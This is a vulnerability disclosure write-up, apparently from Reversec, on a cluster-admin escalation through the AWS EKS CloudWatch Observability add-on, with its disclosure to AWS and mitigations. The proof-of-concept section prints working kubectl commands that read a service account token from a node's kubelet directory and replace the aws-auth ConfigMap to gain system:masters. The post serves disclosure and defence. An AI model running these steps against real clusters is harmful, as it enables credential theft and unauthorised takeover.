Introduction

At the start of 2026, Reversec identified a privilege escalation vulnerability in the CloudWatch Observability Add-on in AWS’s Elastic Kubernetes Service (EKS). This issue provided a way for an attacker to modify the aws-auth ConfigMap in a cluster with the ConfigMap authentication mode enabled. The root cause was an over-privileged service account in a DaemonSet deployed by this add-on, which facilitated escalation to cluster-admin to any attacker that had gained access to a node in the cluster.

This issue was present when using the ‘out-the-box’, default configuration of the observability add-on; that is, it did not require any misconfiguration by the cluster administrators to be exploitable. Therefore it was likely to be commonplace in EKS clusters; Reversec found this vulnerability in two different client environments during two separate engagements in January 2026.

Background

Before walking through the vulnerability itself, let’s quickly cover the relevant components involved.

Amazon CloudWatch Observability Add-on

To quote from the EKS documentation, “Amazon EKS add-ons provide installation and management of a curated set of add-ons for Amazon EKS clusters”. Essentially, these are features that a user can add to their cluster that are managed by the EKS service and provide extra capabilities. Some of these integrate closely with other AWS services, as is the case with the Amazon CloudWatch Observability add-on, which collects metrics from the cluster and delivers them to CloudWatch.

As this is available as an EKS add-on, the installation process is very simple. Observability options are presented to the user during cluster creation in the AWS console, including enabling the CloudWatch agent - alternatively it can be added to an existing cluster by navigating to the Add-Ons tab in the console or using the eks create-addon command using the AWS CLI tool. The only additional configuration needed is to provide an IAM role with the CloudWatchAgentServerPolicy attached to enable the agent to interact with CloudWatch.

EKS Authentication Modes

Currently, EKS has two authentication modes available: “EKS API and ConfigMap” or “EKS API only”.

The EKS API authentication mode uses “access entries” to provide access to the Kubernetes cluster. An EKS access entry associates a set of Kubernetes permissions with an IAM identity; a developer can then assume that IAM identity and use that to authenticate to their EKS Cluster. This authentication mode is currently the option recommended by AWS. It does provide certain advantages, such as centralizing authentication and authorization management and thereby eliminating the need to switch between AWS and Kubernetes APIs to update user permissions.

The ConfigMap mode was the original authentication method for EKS. This mode adds the aws-auth ConfigMap to the kube-system namespace within the cluster, which associates an AWS IAM identity with a Kubernetes RBAC identity. The cluster administrator can configure a role or cluster role bound to that RBAC identity to provide permissions to the cluster resources, or use a pre-defined group such as system:masters. When authenticating to the Kubernetes API server as the AWS IAM identity, authorization is provided based on the role or cluster role associated to the matching group in the aws-auth ConfigMap.

At the time of writing, AWS has deprecated the ConfigMap authentication mode and recommends using the EKS API method. However, there are a number of reasons why the ConfigMap mode may still be enabled, primarily in existing clusters that have not yet been migrated to use access entries. Furthermore, the EKS API mode has a preset list of access entries that provide the Kubernetes RBAC permissions to an IAM identity. If a cluster administrator wishes to apply more granular, custom access they must use the ConfigMap mode, which allows them to fully control the Kubernetes RBAC role permissions.

If using the “EKS API and ConfigMap” authentication mode and an IAM identity has an access entry assigned to it, that access takes precedence over any added to the aws-auth ConfigMap. For example, if an IAM role is granted read-only permissions for a specific namespace via an access entry and also granted cluster-admin permissions via the aws-auth ConfigMap, the role will only have read-only access to the specified namespace.

Pod Separation

When performing a security review of a Kubernetes cluster, EKS or any other flavor, one of the recommendations that can help improve the security posture is to enforce pod separation. That is, it is good practice to use a feature such as Kubernetes Taints and Tolerations to ensure pods of different sensitivity levels are scheduled onto separate nodes. The aim is to limit the impact an attacker could have on a cluster in the event they compromise a pod and manage to escape the container to access the underlying node. For example, if an externally facing pod is compromised, perhaps a pod providing a micro-service to an application, then that pod is unlikely to have significant permissions to interact with other cluster resources. However, if the attacker was able to pivot to another pod on the same node that was running a cluster management service, they may be able to use that pod’s permissions to gain further control of the cluster.

One scenario that is a challenge to enforce pod separation is when a cluster has a monitoring service running. By their nature, such services will need to deploy a pod to every node (usually achieved with a DaemonSet) in order to collect metrics for all cluster resources. These pods may also need more elevated privileges than a typical pod in order to perform their legitimate operation. This can lead to privilege escalation scenarios such as the one identified in the CloudWatch Observability Add-on.

Privilege Escalation Path

To illustrate this privilege escalation path, Reversec deployed a basic EKS cluster using the “EKS API and ConfigMap” authentication mode and enabled the CloudWatch Observability Add-on. This test cluster was deployed following the AWS documentation, and no alterations were made to the add-on - it was deployed in its default state. The latest available versions at the time of testing for Kubernetes and the add-on were used for the cluster (v1.35 and v4.10.1.eksbuild.1 respectively).

With this add-on enabled, EKS created a new namespace (amazon-cloudwatch) and within that deployed a management pod (amazon-cloudwatch-observability-controller-manager) and two DaemonSets: cloudwatch-agent and fluent-bit. The management deployment had a service account with a highly privileged cluster role, giving it permission to modify many resources at the cluster level. Both DaemonSets shared the same service account, cloudwatch-agent. While this service account was mostly limited to cluster-wide read-only permissions, Reversec identified at least two permissions that could be used to compromise the entire cluster.

The first of these was the permission to update ConfigMaps at the cluster level; this could be used to modify the aws-auth ConfigMap and grant cluster-admin rights to the attacker. The second was the get permission on the nodes/proxy resource; a recently published article (2026-01-26) explains how this permission can be used to gain code execution on all pods in a cluster. Reversec’s research in this article focuses on the former issue relating to the ConfigMap permission, details on the nodes/proxy vulnerability can be found on Graham Helton’s blog post.

As a starting point for a proof-of-concept, Reversec deployed the following resources to the cluster. This created a role with full permissions for the pod and pod/exec resources in the application namespace only. The role was bound to a group, which in turn was added to the aws-auth ConfigMap to assign these permissions to an IAM role.

apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: app-user-role
  namespace: app-namespace
rules:
- apiGroups: [""]
  resources: ["pods", "pods/exec",]
  verbs: ["*"]
- apiGroups: ["apps"]
  resources: ["deployments"]
  verbs: ["*"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: app-user-binding
  namespace: app-namespace
subjects:
- kind: Group
  name: app-users
  apiGroup: rbac.authorization.k8s.io
roleRef:
  kind: Role
  name: app-user-role
  apiGroup: rbac.authorization.k8s.io
---
apiVersion: v1
kind: ConfigMap
metadata:
  name: aws-auth
  namespace: kube-system
data:
  mapRoles: |
    - rolearn: arn:aws:iam::519197412674:role/cloudWatchAddonPrivEscEKSNodeRole
      groups:
      - system:bootstrappers
      - system:nodes
      username: system:node:{{EC2PrivateDNSName}}
    - rolearn: arn:aws:iam::519197412674:role/eksCloudWatchAddonPrivEscAppRole
      groups:
      - app-users
      username: app-user

Assuming the eksCloudWatchAddonPrivEscAppRole role, Reversec verified their identity within the Kubernetes cluster and demonstrated the limited access:

kubectl auth whoami
ATTRIBUTE                                              VALUE
Username                                               app-user
UID                                                    aws-iam-authenticator:519197412674:AROAXRYUTZVBOUKMAI7NC
Groups                                                 [app-users system:authenticated]
Extra: accessKeyId                                     [ASIAXRYUTZVBC6GMF4E5]
Extra: arn                                             [arn:aws:sts::519197412674:assumed-role/eksCloudWatchAddonPrivEscAppRole/kube-app-user]
Extra: canonicalArn                                    [arn:aws:iam::519197412674:role/eksCloudWatchAddonPrivEscAppRole]
Extra: principalId                                     [AROAXRYUTZVBOUKMAI7NC]
Extra: sessionName                                     [kube-app-user]
Extra: sigs.k8s.io/aws-iam-authenticator/principalId   [AROAXRYUTZVBOUKMAI7NC]


kubectl -n kube-system get configmaps aws-auth
Error from server (Forbidden): configmaps "aws-auth" is forbidden: User "app-user" cannot get resource "configmaps" in API group "" in the namespace "kube-system"

kubectl get pods -A
Error from server (Forbidden): pods is forbidden: User "app-user" cannot list resource "pods" in API group "" at the cluster scope

Next, Reversec deployed a privileged pod to the application namespace to which this user had access. The pod was configured to mount the host filesystem and would therefore be able to access details of other pods running on the same node, including service account tokens. Once deployed, Reversec executed into the pod and extracted the token for the cloudwatch-agent service account from one of the DaemonSets deployed by the observability add-on.

kubectl -n app-namespace exec priv-app-9c9ddbf8-t87xk -it -- /bin/bash

root@priv-app-9c9ddbf8-t87xk:/# cd /hostfs/var/lib/kubelet/pods

root@priv-app-9c9ddbf8-t87xk:/hostfs/var/lib/kubelet/pods# find . -name "*otc*"
./3da430d3-b605-4109-b3b5-37ee40503cf9/volumes/kubernetes.io~configmap/otc-internal
./3da430d3-b605-4109-b3b5-37ee40503cf9/plugins/kubernetes.io~empty-dir/wrapped_otc-internal
./3da430d3-b605-4109-b3b5-37ee40503cf9/containers/otc-container

root@priv-app-9c9ddbf8-t87xk:/hostfs/var/lib/kubelet/pods# cd 3da430d3-b605-4109-b3b5-37ee40503cf9/volumes/kubernetes.io~projected/kube-api-access-6w4nq/

root@priv-app-9c9ddbf8-t87xk:/hostfs/var/lib/kubelet/pods/3da430d3-b605-4109-b3b5-37ee40503cf9/volumes/kubernetes.io~projected/kube-api-access-6w4nq# ls
ca.crt  namespace  token

root@priv-app-9c9ddbf8-t87xk:/hostfs/var/lib/kubelet/pods/3da430d3-b605-4109-b3b5-37ee40503cf9/volumes/kubernetes.io~projected/kube-api-access-6w4nq# cat token
eyJhbGci...

With the cloudwatch-agent service account token, it was now possible to update the aws-auth ConfigMap. Using the kubectl edit command opened the editor for edits to be made. However, when closing the editor, the update failed due to the absence of the ‘patch’ permission (which the kubectl edit command uses to make changes to a resource), but a copy of the updated manifest was saved locally. This could then be applied, which leverages the ‘update’ permission, and the resource was successfully modified. Reversec used this approach to add the current user to the system:masters group, granting this user cluster-admin privileges, as illustrated below:

kubectl --token=$TOKEN auth whoami
ATTRIBUTE                                           VALUE
Username                                            system:serviceaccount:amazon-cloudwatch:cloudwatch-agent
UID                                                 03eb0898-9bf0-484f-a659-458a823bdc5f
Groups                                              [system:serviceaccounts system:serviceaccounts:amazon-cloudwatch system:authenticated]
Extra: authentication.kubernetes.io/credential-id   [JTI=6e9c4655-ce37-4744-a5e3-e7b8f9d6682a]
Extra: authentication.kubernetes.io/node-name       [ip-192-168-222-204.ec2.internal]
Extra: authentication.kubernetes.io/node-uid        [3504d4a1-5a42-4c7c-8fe7-f6411ca16a77]
Extra: authentication.kubernetes.io/pod-name        [cloudwatch-agent-prnf4]
Extra: authentication.kubernetes.io/pod-uid         [3da430d3-b605-4109-b3b5-37ee40503cf9]

kubectl --token=$TOKEN -n kube-system get configmap aws-auth
NAME       DATA   AGE
aws-auth   1      55m

kubectl --token=$TOKEN -n kube-system edit configmap aws-auth
error: configmaps "aws-auth" could not be patched: configmaps "aws-auth" is forbidden: User "system:serviceaccount:amazon-cloudwatch:cloudwatch-agent" cannot patch resource "configmaps" in API group "" in the namespace "kube-system"
You can run `kubectl replace -f /var/folders/z0/9mxlgc0n24dbvm7yqgj_qf500000gp/T/kubectl-edit-3640773212.yaml` to try this update again.

cat /var/folders/z0/9mxlgc0n24dbvm7yqgj_qf500000gp/T/kubectl-edit-376693018.yaml
# Please edit the object below. Lines beginning with a '#' will be ignored,
# and an empty file will abort the edit. If an error occurs while saving this file will be
# reopened with the relevant failures.
#
apiVersion: v1
data:
  mapRoles: |
    - rolearn: arn:aws:iam::519197412674:role/cloudWatchAddonPrivEscEKSNodeRole
      groups:
      - system:bootstrappers
      - system:nodes
      username: system:node:{{EC2PrivateDNSName}}
    - rolearn: arn:aws:iam::519197412674:role/eksCloudWatchAddonPrivEscAppRole
      groups:
      - app-users
      - system:masters
      username: app-user
kind: ConfigMap
metadata:
  annotations:
    kubectl.kubernetes.io/last-applied-configuration: |
      {"apiVersion":"v1","data":{"mapRoles":"- rolearn: arn:aws:iam::519197412674:role/cloudWatchAddonPrivEscEKSNodeRole\n  groups:\n  - system:bootstrappers\n  - system:nodes\n  username: system:node:{{EC2PrivateDNSName}}\n- rolearn: arn:aws:iam::519197412674:role/eksCloudWatchAddonPrivEscAppRole\n  groups:\n  - app-users\n  username: app-user\n"},"kind":"ConfigMap","metadata":{"annotations":{},"name":"aws-auth","namespace":"kube-system"}}
  creationTimestamp: "2026-02-16T16:48:09Z"
  name: aws-auth
  namespace: kube-system
  resourceVersion: "273872"
  uid: 477ff0ae-7c83-446b-b7d9-d061fa64033f

kubectl --token=$TOKEN replace -f /var/folders/z0/9mxlgc0n24dbvm7yqgj_qf500000gp/T/kubectl-edit-376693018.yaml
configmap/aws-auth replaced

Once updated, Reversec verified the user now had full cluster access:

kubectl auth whoami
ATTRIBUTE                                              VALUE
Username                                               app-user
UID                                                    aws-iam-authenticator:519197412674:AROAXRYUTZVBOUKMAI7NC
Groups                                                 [app-users system:masters system:authenticated]
Extra: accessKeyId                                     [ASIAXRYUTZVBC6GMF4E5]
Extra: arn                                             [arn:aws:sts::519197412674:assumed-role/eksCloudWatchAddonPrivEscAppRole/kube-app-user]
Extra: canonicalArn                                    [arn:aws:iam::519197412674:role/eksCloudWatchAddonPrivEscAppRole]
Extra: principalId                                     [AROAXRYUTZVBOUKMAI7NC]
Extra: sessionName                                     [kube-app-user]
Extra: sigs.k8s.io/aws-iam-authenticator/principalId   [AROAXRYUTZVBOUKMAI7NC]

kubectl get pods -A
NAMESPACE           NAME                                                              READY   STATUS    RESTARTS   AGE
amazon-cloudwatch   amazon-cloudwatch-observability-controller-manager-5c5b977gwqxq   1/1     Running   0          25h
amazon-cloudwatch   cloudwatch-agent-82n5z                                            1/1     Running   0          25h
amazon-cloudwatch   cloudwatch-agent-prnf4                                            1/1     Running   0          25h
amazon-cloudwatch   fluent-bit-fqbfz                                                  1/1     Running   0          25h
amazon-cloudwatch   fluent-bit-ftmsn                                                  1/1     Running   0          25h
app-namespace       priv-app-9c9ddbf8-t87xk                                           1/1     Running   0          147m
external-dns        external-dns-66df598888-klcb5                                     1/1     Running   0          25h
kube-system         aws-node-8tw7k                                                    2/2     Running   0          25h
kube-system         aws-node-mtcds                                                    2/2     Running   0          25h
kube-system         coredns-7bc7c74875-6tzmc                                          1/1     Running   0          25h
kube-system         coredns-7bc7c74875-bpgkt                                          1/1     Running   0          25h
kube-system         eks-node-monitoring-agent-7vt56                                   1/1     Running   0          25h
kube-system         eks-node-monitoring-agent-tvcdk                                   1/1     Running   0          25h
kube-system         eks-pod-identity-agent-4l9gf                                      1/1     Running   0          25h
kube-system         eks-pod-identity-agent-wzhrk                                      1/1     Running   0          25h
kube-system         kube-proxy-22zbj                                                  1/1     Running   0          25h
kube-system         kube-proxy-lvdm6                                                  1/1     Running   0          25h
kube-system         metrics-server-7649fff9f-9h6m7                                    1/1     Running   0          25h
kube-system         metrics-server-7649fff9f-blx8x                                    1/1     Running   0          25h

Root Cause Analysis

As demonstrated above, the root cause that allows this privilege escalation is the permission for the cloudwatch-agent service account to update ConfigMaps at the cluster level. While the management deployment service account for the CloudWatch Add-on has far more privileges, this deployment could be segregated to a ‘management’ node to minimize its exposure. However, the cloudwatch-agent and fluent-bit DaemonSets must have a pod on every node to be able to collect metrics for the entire cluster.

Reversec’s first thought was to investigate whether the cloudwatch-agent service account needs this permission at all. Looking at the cluster’s ConfigMaps, there are a number of these resources in the amazon-cloudwatch namespace.

kubectl get configmaps -A
NAMESPACE           NAME                                                   DATA   AGE
amazon-cloudwatch   cloudwatch-agent                                       1      45h
amazon-cloudwatch   cloudwatch-agent-windows                               1      45h
amazon-cloudwatch   cloudwatch-agent-windows-container-insights            1      45h
amazon-cloudwatch   cwagent-clusterleader                                  0      45h
amazon-cloudwatch   dcgm-exporter-config-map                               2      45h
amazon-cloudwatch   fluent-bit-config                                      5      45h
amazon-cloudwatch   fluent-bit-windows-config                              5      45h
amazon-cloudwatch   kube-root-ca.crt                                       1      45h
amazon-cloudwatch   neuron-monitor-config-map                              1      45h
app-namespace       kube-root-ca.crt                                       1      23h
default             kube-root-ca.crt                                       1      45h
external-dns        kube-root-ca.crt                                       1      45h
kube-node-lease     kube-root-ca.crt                                       1      45h
kube-public         kube-root-ca.crt                                       1      45h
kube-system         amazon-vpc-cni                                         7      45h
kube-system         aws-auth                                               1      45h
kube-system         coredns                                                1      45h
kube-system         extension-apiserver-authentication                     6      45h
kube-system         kube-apiserver-legacy-service-account-token-tracking   1      45h
kube-system         kube-proxy                                             1      45h
kube-system         kube-proxy-config                                      1      45h
kube-system         kube-root-ca.crt                                       1      45h

The hypothesis was that the cloudwatch-agent service account may be responsible for updating the cloudwatch-agent ConfigMap. Looking at this ConfigMap, it contained the agent’s configuration:

kubectl -n amazon-cloudwatch get cm cloudwatch-agent -o jsonpath='{.data}' | jq -r '."cwagentconfig.json"' | jq
{
  "agent": {
    "region": "us-east-1"
  },
  "logs": {
    "metrics_collected": {
      "application_signals": {
        "hosted_in": "cloudwatchaddon-privesc-testcluster"
      },
      "kubernetes": {
        "cluster_name": "cloudwatchaddon-privesc-testcluster",
        "enhanced_container_insights": true
      }
    }
  },
  "traces": {
    "traces_collected": {
      "application_signals": {}
    }
  }
}

This configuration could be updated with the following AWS CLI command, updating the enhanced_container_insights value to false:

aws eks update-addon \
  --cluster-name cloudwatchaddon-privesc-testcluster \
  --addon-name amazon-cloudwatch-observability \
  --service-account-role-arn arn:aws:iam::519197412674:role/AmazonEKSPodIdentityAmazonCloudWatchObservabilityRole \
  --configuration-values '{"agent": {"config": {"logs": {"metrics_collected": {"application_signals": {},"kubernetes": {"enhanced_container_insights": false}}},"traces": {"traces_collected": {"application_signals": {}}}}}}'

Running this command did update the above ConfigMap. Next, Reversec modified the cluster role for the cloudwatch-agent service account to remove the ‘update’ permission for ConfigMaps. Running the same update command now no longer changed the cloudwatch-agent ConfigMap. Running the following command confirmed the update had failed:

aws eks describe-addon \
  --cluster-name cloudwatchaddon-privesc-testcluster \
  --addon-name amazon-cloudwatch-observability
  
{
    "addon": {
        "addonName": "amazon-cloudwatch-observability",
        "clusterName": "cloudwatchaddon-privesc-testcluster",
        "status": "UPDATE_FAILED",
        "addonVersion": "v4.10.1-eksbuild.1",
        "health": {
            "issues": [
                {
                    "code": "ConfigurationConflict",
                    "message": "Conflicts found when trying to apply. Will not continue due to resolve conflicts mode. Conflicts:\nClusterRole.rbac.authorization.k8s.io cloudwatch-agent-role - .rules"
                }
---

This implied that the cloudwatch-agent is responsible for updating at least one ConfigMap. This posed two further questions:

  1. Why is the role cluster-wide and not restricted to the amazon-cloudwatch namespace?
  2. Why is the agent updating the ConfigMap, rather than the add-on’s management deployment?

For the first question, Reversec attempted to modify the configuration to use a role bound to the namespace rather than a cluster role. The initial approach was to create an exact copy of the existing cluster role with all the same permissions but make this a role in the amazon-cloudwatch namespace. This attempt failed because the cluster role included some non-resource URLs, which cannot be namespaced and can only be assigned at the cluster-level. This may explain why the cloudwatch-agent service account was assigned a cluster role in the first place. However, a more secure approach would be to create two sets of permissions: one role bound to the namespace for the majority of permissions, especially write permissions; one cluster role only for those permissions required at the cluster-level.

Reversec attempted to implement this in the test cluster by creating a new namespaced role with the update ConfigMaps permission and binding it to the cloudwatch-agent. The update ConfigMaps permission was then removed for the existing cluster role. This configuration still failed in the same manner as the previous attempt - updating the add-on failed and returned the same error as above. The error message, “Conflicts found when trying to apply. Will not continue due to resolve conflicts mode. Conflicts:\nClusterRole.rbac.authorization.k8s.io cloudwatch-agent-role - .rules” implied the issue was related to the cluster role, though what it was conflicting with was unclear. As a final attempt Reversec deleted the cluster role entirely and just kept the namespaced role with update ConfigMap permissions. In this scenario, after running the command to update the add-on, EKS re-deployed the missing cluster role before successfully making the update with the restored permissions. Therefore, Reversec was unable to confirm whether a namespace role would be sufficient, as the managed EKS service would not permit the required modifications to the Kubernetes resource to test the hypothesis.

The second question is harder to answer without more information about how the add-on works under the hood. This is one of the trade-offs when using a managed service like EKS: deployment and management is easier because some of the workload is taken care of by the service, but this is at the expense of losing control over the abstracted components of the service. However, from observations of this add-on and its resources, it would make sense to use the management deployment to make modifications to the add-on’s resources leaving the cloudwatch-agent to only perform metric collection. This way, cluster administrators could apply pod separation and minimize the risk of cluster-wide compromise by keeping this pod on a separate node to other workloads.

Responsible Disclosure and AWS’ Response

Reversec disclosed this finding to AWS on 23rd February 2026. AWS responded on 9th April, acknowledging the issue and stating that they had updated the permissions to address this vulnerability. Their full response is printed below:

Thank you for your submission regarding the Amazon CloudWatch Observability EKS add-on.  
  
We have reviewed your report and appreciate you bringing this to our attention. The scenario you described requires the ability to deploy privileged pods with host filesystem access, which in Kubernetes environments provides inherent access to service account credentials on the node.  
  
We have updated the agent's permissions and our documentation to provide clearer visibility into the add-on's permissions.  
  
We recommend customers follow EKS security best practices, including using EKS access entries instead of the aws-auth ConfigMap where possible, and implementing Pod Security Standards to restrict privileged workloads [1][2].  
  
Thank you for your contribution to our ongoing security efforts.  
  
[1] [https://docs.aws.amazon.com/eks/latest/best-practices/](https://docs.aws.amazon.com/eks/latest/best-practices/)  
[2] [https://aws.github.io/aws-eks-best-practices/security/docs/pods/](https://aws.github.io/aws-eks-best-practices/security/docs/pods/)

While Reversec could not find any clear documentation about the permissions the agent uses, the permissions for the add-on had been modified. From version v5.3.0-eksbuild.1 onwards, a new role (cloudwatch-agent-role) has been introduced to the add-on and bound to the agent’s service account in the amazon-cloudwatch namespace. This new role contains the update ConfigMap permissions, which has now been removed from the cluster role. This will enable the agent to continue to perform its intended operation and update the ConfigMaps within the amazon-cloudwatch namespace, but the agent no longer has the capability to update ConfigMaps cluster-wide and therefore can no longer be used by an adversary to update the aws-auth ConfigMap.

It is important to note that this change to the permissions does nothing to address the vulnerability exploiting the get nodes/proxy permission. The cloudwatch-agent service account maintains this permission and so an attacker could still use this technique to access management pods on any node and escalate to cluster-admin in an EKS deployment using the Amazon CloudWatch Observability add-on. A potential mitigation proposed in the blog post that disclosed this issue is to restrict traffic on the Kubelet port. However, this could have unforeseen impact on a cluster’s legitimate operation and would require further research to provide an actionable recommendation. While this is a more complicated technique, any EKS cluster that uses this add-on will have an escalation path to cluster-admin from any node.

Recommendations

To remove the specific vulnerability relating to the aws-auth ConfigMap, simply upgrading to any version of the add-on from version v5.3.0-eksbuild.1 onwards will address the issue. However, as discussed above, this will not remove all privilege escalation paths for EKS clusters using the Amazon CloudWatch Observability add-on. Therefore, cluster owners must take a decision based on the threat model of their environment along with their risk appetite on whether to continue using this add-on. To exploit either of the escalation paths discussed here, an attacker would need to gain access to a cluster node and therefore it is not trivial to exploit; other misconfigurations or vulnerabilities would need to be present to provide an attacker a route to the node. Implementing restrictive Pod Security may be sufficient to mitigate the risk enough to continue using the add-on with its privilege escalation risk. In an environment with more sensitive workloads it may be necessary to disable the add-on and lose the tightly integrated observability features.

A more general recommendation, which applies to administrators of all Kubernetes clusters and not just EKS instances, is to audit the permissions of identities operating within the cluster. This should include identities provided by third party tooling, as these may introduce weaknesses in the permission model, as was the case in the examples discussed here. Tools such as IceKube can be used to quickly and easily identify escalation paths from different positions within a cluster.

Conclusions

Observability tools by design often require both to be present on every node and have a higher level of privilege in order to have the access needed to gather the data to perform their function. This makes them a prime target for unintended privilege escalation paths through the cluster and should therefore be closely examined for potential security weaknesses. These tools should aim to follow a design architecture of limiting the data gathering DaemonSet’s permissions to read only, with the more impactful write permissions being separated onto a management deployment that can be scheduled onto a separate, privileged node.

Using managed services like EKS provides many advantages in expediting deployments as many facets are handled by the service. However, the danger comes from assuming that because it is a managed service, it is immune from any security issues. In the case of the aws-auth ConfigMap vulnerability described here, a cluster owner could implement EKS features following all guidance and unwittingly introduce vulnerabilities to their environment. This vulnerability did not require any misconfigurations to be exploitable. It remains critical to perform holistic security reviews, taking on the mindset of an attacker and how they might impact systems - after all, an attacker will not care if a resource is user controlled or a managed service, they will exploit it if it helps them achieve their objective.

Defense-in-depth remains an essential aspect of security. Applying techniques such as pod separation along with the principle of least privilege (for users and workloads) can help provide layers of protection in the event of an attacker gaining a foothold. If someone manages to kick down the front door, it’s less of a concern if they are restricted to the entrance hall that contains no valuables. At the very least, cluster owners should be aware of the potential routes an attacker could take and what impact they could have in such a scenario; in cases where there are no options to completely remove the risk, being aware of it can help focus attention on mitigations and other security controls to minimize the likelihood of a serious security breach.